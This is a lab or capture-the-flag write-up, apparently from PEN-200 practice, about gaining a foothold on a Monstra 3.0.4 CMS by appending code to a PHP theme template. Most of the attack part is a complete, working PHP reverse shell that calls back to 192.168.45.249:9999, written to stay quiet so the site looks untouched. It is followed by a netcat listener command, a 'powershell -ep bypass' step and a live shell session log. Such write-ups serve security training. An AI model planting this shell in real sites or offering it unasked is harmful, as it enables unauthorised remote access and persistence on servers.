Monstra Theme Edit
The target Monstra instance runs an outdated version, 3.0.4, which has a number of published vulnerabilities.
However, exploiting them is harder than it looks: most public exploits rely on the file upload feature, which does not appear to be functioning as it should on this target. I will therefore opt for another vector to gain the initial foothold.
Most CMSs support "themes", and the theme files can be edited once administrative access has been obtained.
Monstra is no exception: its theme templates are PHP files, so any PHP appended to one is executed server-side whenever that template is rendered.
I will go with this one
Appending the payload at the bottom
Save and Exit
Invoking the payload by navigating to the blog:
/blog/blog
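The steps above (edit a theme template, append a payload, trigger it by loading the blog) as one worked example. This is an added example and not the payload used in the writeup: a minimal PHP reverse shell that can be appended to the bottom of a Monstra theme template. It reuses the listener address and port from the writeup (192.168.45.249:9999) as assumptions; the function name theme_rshell is mine. It spawns cmd.exe on Windows (the XAMPP case here) or /bin/sh elsewhere and relays bytes between the shell and the socket by polling, because stream_select() does not work on proc_open() pipes under Windows.

```php
<?php
// Added example, not the writeup's own payload: minimal PHP reverse shell to
// append to the bottom of a Monstra theme template. It runs every time the
// template is rendered (for example when /blog/blog is requested).
// LHOST/LPORT below are assumptions taken from the writeup's listener.
if (!function_exists('theme_rshell')) {
    function theme_rshell($lhost, $lport)
    {
        // Keep the session alive past max_execution_time and past the
        // browser giving up on the (never-finishing) HTTP response.
        set_time_limit(0);
        ignore_user_abort(true);

        // Short connect timeout: if no listener is up, return quietly so the
        // rest of the template still renders and the site looks untouched.
        $sock = @fsockopen($lhost, $lport, $errno, $errstr, 5);
        if (!$sock) {
            return;
        }

        // cmd.exe on Windows (XAMPP target), an interactive sh elsewhere.
        $shell = (strncasecmp(PHP_OS, 'WIN', 3) === 0) ? 'cmd.exe' : '/bin/sh -i';
        $spec  = array(
            0 => array('pipe', 'r'),   // child stdin
            1 => array('pipe', 'w'),   // child stdout
            2 => array('pipe', 'w'),   // child stderr
        );
        $proc = proc_open($shell, $spec, $pipes);
        if (!is_resource($proc)) {
            fclose($sock);
            return;
        }

        // Poll rather than stream_select(): PHP documents that stream_select()
        // fails on proc_open() pipes under Windows. On Linux the calls below
        // make the pipes non-blocking; on Windows PHP already emulates
        // non-blocking pipe reads, so a failed stream_set_blocking() is harmless.
        stream_set_blocking($sock, false);
        @stream_set_blocking($pipes[1], false);
        @stream_set_blocking($pipes[2], false);

        while (true) {
            $status = proc_get_status($proc);
            if (!$status['running'] || feof($sock)) {
                break;
            }
            // attacker -> shell stdin
            $in = fread($sock, 4096);
            if ($in !== false && $in !== '') {
                fwrite($pipes[0], $in);
                fflush($pipes[0]);
            }
            // shell stdout/stderr -> attacker
            foreach (array($pipes[1], $pipes[2]) as $p) {
                $out = fread($p, 4096);
                if ($out !== false && $out !== '') {
                    fwrite($sock, $out);
                }
            }
            usleep(50000); // 50 ms between polls keeps CPU usage low while idle
        }

        foreach ($pipes as $p) {
            fclose($p);
        }
        proc_close($proc);
        fclose($sock);
    }
}

theme_rshell('192.168.45.249', 9999);
?>
```

Start the listener first (nc -nlvp 9999; the writeup's nnc 9999 is presumably an alias for that), then request /blog/blog. Two things to keep in mind: the HTTP response for that request never completes while the shell is alive, and every render of the template while the listener is reachable spawns a fresh shell, so restore the original template once the foothold is established.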
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/monster]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.156.180] 49801
SOCKET: Shell has connected! PID: 4832
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\blog> powershell -ep bypass -nop
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\xampp\htdocs\blog> whoami
mike-pc\mike
PS C:\xampp\htdocs\blog> hostname
Mike-PC
PS C:\xampp\htdocs\blog> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.156.180
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.156.254
Initial foothold established on the target system as the mike user by editing a PHP theme file of the target Monstra instance.